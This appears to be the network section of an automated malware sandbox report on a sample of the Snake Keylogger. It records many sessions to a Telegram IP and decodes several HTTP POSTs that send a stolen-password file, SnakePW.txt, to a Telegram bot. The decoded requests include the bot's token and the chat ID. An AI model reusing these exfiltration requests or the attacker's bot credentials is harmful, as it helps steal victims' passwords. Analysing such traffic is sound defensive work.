                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            72192.168.2.549895149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            73192.168.2.549898149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            74192.168.2.549901149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            75192.168.2.549904149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            76192.168.2.549906149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            77192.168.2.549907149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            78192.168.2.549909149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            79192.168.2.549911149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            8192.168.2.549776149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            80192.168.2.549913149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            81192.168.2.549914149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            82192.168.2.549917149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            83192.168.2.549919149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            84192.168.2.549922149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            85192.168.2.549925149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            86192.168.2.549928149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            87192.168.2.549931149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            88192.168.2.549934149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            89192.168.2.549936149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            9192.168.2.549777149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            90192.168.2.549937149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            91192.168.2.549938149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            92192.168.2.549939149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            93192.168.2.549940149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            94192.168.2.549941149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            95192.168.2.549942149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            96192.168.2.549943149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            97192.168.2.549944149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            98192.168.2.549945149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            99192.168.2.549946149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            0192.168.2.549759149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:25 UTC0OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756c77a0974
                            Host: api.telegram.org
                            Content-Length: 504
                            Connection: Keep-Alive
                            2022-06-26 07:32:25 UTC0OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 63 37 37 61 30 39 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756c77a0974Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:25 UTC0INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:25 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:25 UTC1INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 34 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 34 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66746,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228745,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            1192.168.2.549769149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:38 UTC1OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756d450ded5
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:32:38 UTC2OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 34 35 30 64 65 64 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756d450ded5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:39 UTC2INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:39 GMT
                            Content-Type: application/json
                            Content-Length: 509
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:39 UTC2INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 34 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 35 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66747,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228758,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            10192.168.2.549778149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:42 UTC16OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756d69dc2b3
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:32:42 UTC17OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 36 39 64 63 32 62 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756d69dc2b3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:42 UTC17INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:42 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:42 UTC18INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 35 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66756,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228762,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            100192.168.2.549947149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:21 UTC168OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756edd5834d
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:21 UTC169OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 64 64 35 38 33 34 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756edd5834dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:21 UTC169INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:21 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:21 UTC170INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 35 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66859,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228801,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            101192.168.2.549948149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:21 UTC170OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756ee09fa00
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:21 UTC170OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 65 30 39 66 61 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756ee09fa00Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:21 UTC171INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:21 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:21 UTC171INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 36 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66860,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228801,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            102192.168.2.549949149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:22 UTC172OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756ee4f1b35
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:22 UTC172OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 65 34 66 31 62 33 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756ee4f1b35Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:22 UTC173INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:22 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:22 UTC173INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 36 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66861,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228802,"document":{"file_


